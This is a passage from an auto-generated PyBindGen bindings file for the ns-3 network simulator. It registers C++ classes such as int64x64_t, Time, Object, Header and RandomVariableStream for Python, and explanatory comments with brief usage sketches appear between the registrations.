cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
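# Note: the registrations above expose ns3::int64x64_t to Python as a
# numeric-like type: constructors from the integral types and double,
# binary '+', '-', '/', the comparison operators, and __str__ via
# add_output_stream_operator(). A minimal usage sketch (hedged: assumes
# the bindings are compiled and importable as ns.core, which varies
# between ns-3 releases):
#
#   import ns.core
#   a = ns.core.int64x64_t(1.5)        # double constructor registered above
#   b = a + ns.core.int64x64_t(2)      # binary '+' registered above
#   print(b.GetDouble(), b.GetHigh(), b.GetLow())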
def register_Ns3AcousticModemEnergyModelHelper_methods(root_module, cls):
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::AcousticModemEnergyModelHelper::AcousticModemEnergyModelHelper(ns3::AcousticModemEnergyModelHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AcousticModemEnergyModelHelper const &', 'arg0')])
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::AcousticModemEnergyModelHelper::AcousticModemEnergyModelHelper() [constructor]
cls.add_constructor([])
## acoustic-modem-energy-model-helper.h (module 'uan'): void ns3::AcousticModemEnergyModelHelper::Set(std::string name, ns3::AttributeValue const & v) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'v')],
is_virtual=True)
## acoustic-modem-energy-model-helper.h (module 'uan'): void ns3::AcousticModemEnergyModelHelper::SetDepletionCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetDepletionCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')])
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::Ptr<ns3::DeviceEnergyModel> ns3::AcousticModemEnergyModelHelper::DoInstall(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::EnergySource> source) const [member function]
cls.add_method('DoInstall',
'ns3::Ptr< ns3::DeviceEnergyModel >',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_const=True, visibility='private', is_virtual=True)
return
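# Note: AcousticModemEnergyModelHelper registers Set()/SetDepletionCallback()
# publicly and DoInstall() as a private virtual, which the public Install()
# of the DeviceEnergyModelHelper base class (registered elsewhere) invokes.
# A hedged sketch of typical use, where 'devices' and 'sources' are
# hypothetical NetDeviceContainer / EnergySourceContainer objects:
#
#   import ns.uan
#   modemEnergyHelper = ns.uan.AcousticModemEnergyModelHelper()
#   deviceEnergyModels = modemEnergyHelper.Install(devices, sources)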
def register_Ns3Chunk_methods(root_module, cls):
## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
cls.add_constructor([])
## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Header_methods(root_module, cls):
cls.add_output_stream_operator()
## header.h (module 'network'): ns3::Header::Header() [constructor]
cls.add_constructor([])
## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Header const &', 'arg0')])
## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Start() [member function]
cls.add_method('Start',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
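# Note: in these registrations visibility='protected' mirrors the C++ access
# level, and is_virtual=True marks methods that PyBindGen wraps so they can
# be overridden where subclassing is allowed; for ns3::Object that covers the
# copy constructor and DoDispose/DoStart/NotifyNewAggregate above, while the
# public API (AggregateObject, Dispose, GetAggregateIterator,
# GetInstanceTypeId, Start) is exposed directly.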
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
def register_Ns3RandomVariableStream_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::RandomVariableStream::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::RandomVariableStream::RandomVariableStream() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetStream(int64_t stream) [member function]
cls.add_method('SetStream',
'void',
[param('int64_t', 'stream')])
## random-variable-stream.h (module 'core'): int64_t ns3::RandomVariableStream::GetStream() const [member function]
cls.add_method('GetStream',
'int64_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetAntithetic(bool isAntithetic) [member function]
cls.add_method('SetAntithetic',
'void',
[param('bool', 'isAntithetic')])
## random-variable-stream.h (module 'core'): bool ns3::RandomVariableStream::IsAntithetic() const [member function]
cls.add_method('IsAntithetic',
'bool',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::RandomVariableStream::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::RandomVariableStream::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_pure_virtual=True, is_virtual=True)
## random-variable-stream.h (module 'core'): ns3::RngStream * ns3::RandomVariableStream::Peek() const [member function]
cls.add_method('Peek',
'ns3::RngStream *',
[],
is_const=True, visibility='protected')
return
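# Note: RandomVariableStream is the abstract base of the stream-based random
# variables: GetValue()/GetInteger() are registered as pure virtual, and
# Peek() is only visible to subclasses (visibility='protected'). The concrete
# distributions registered below implement these virtuals.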
def register_Ns3SequentialRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::SequentialRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable::SequentialRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): ns3::Ptr<ns3::RandomVariableStream> ns3::SequentialRandomVariable::GetIncrement() const [member function]
cls.add_method('GetIncrement',
'ns3::Ptr< ns3::RandomVariableStream >',
[],
is_const=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetConsecutive() const [member function]
cls.add_method('GetConsecutive',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
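# Note: the SimpleRefCount<T, ns3::empty, ns3::DefaultDeleter<T>> blocks above
# only exist so that the reference-counting base of types handled through
# ns3::Ptr<> (AttributeAccessor, AttributeChecker, AttributeValue,
# CallbackImplBase, EventImpl, NixVector, Packet, TraceSourceAccessor) is
# known to the bindings; each exposes just the default/copy constructor and
# the static Cleanup() hook.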
def register_Ns3Time_methods(root_module, cls):
cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::FreezeResolution() [member function]
cls.add_method('FreezeResolution',
'void',
[],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
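# Note: ns3::Time is registered with arithmetic ('+', '-', '+=', '-='),
# comparisons, and the conversion helpers (GetSeconds, GetMilliSeconds,
# ToDouble, ToInteger, ...). A brief usage sketch (hedged: assumes ns.core is
# built and that the Seconds/MilliSeconds free functions registered elsewhere
# in this module are available):
#
#   import ns.core
#   t = ns.core.Seconds(1.5) + ns.core.MilliSeconds(20)
#   print(t.GetMilliSeconds())          # 1520
#   print(t.ToDouble(ns.core.Time.S))   # 1.52, as a double in seconds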
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
